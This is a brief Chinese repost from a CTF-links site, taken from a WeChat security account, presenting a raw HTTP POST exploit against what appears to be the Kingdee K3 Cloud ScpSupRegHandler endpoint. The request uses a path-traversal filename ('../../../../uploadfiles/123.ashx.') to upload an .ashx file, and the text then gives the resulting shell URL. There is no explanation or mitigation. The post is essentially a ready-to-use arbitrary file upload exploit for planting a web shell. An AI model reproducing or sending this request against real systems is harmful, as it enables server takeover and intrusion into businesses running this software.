别找了,在这里

POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1Host: xx.xx.xx.xxAccept-Encoding: identityContent-Length: 973Accept-Language: zh-CN,zh;q=0.8Accept: */*User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 infoAccept-Charset: GBK,utf-8;q=0.7,*;q=0.3Connection: keep-aliveReferer: http://www.baidu.comCache-Control: max-age=0Content-Type: multipart/form-data; boundary=2ac719f8e29343df94aa4ab49e456061
--2ac719f8e29343df94aa4ab49e456061Content-Disposition: form-data; name="dbId_v"
.--2ac719f8e29343df94aa4ab49e456061Content-Disposition: form-data; name="FID"
2022--2ac719f8e29343df94aa4ab49e456061Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/123.ashx."Content-Type: text/plain
123--2ac719f8e29343df94aa4ab49e456061--

shell

/K3Cloud/uploadfiles/123.ashx


原文始发于微信公众号(摸鱼Sec):别找了,在这里

版权声明:admin 发表于 2023年11月3日 上午11:27。
转载请注明:别找了,在这里 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...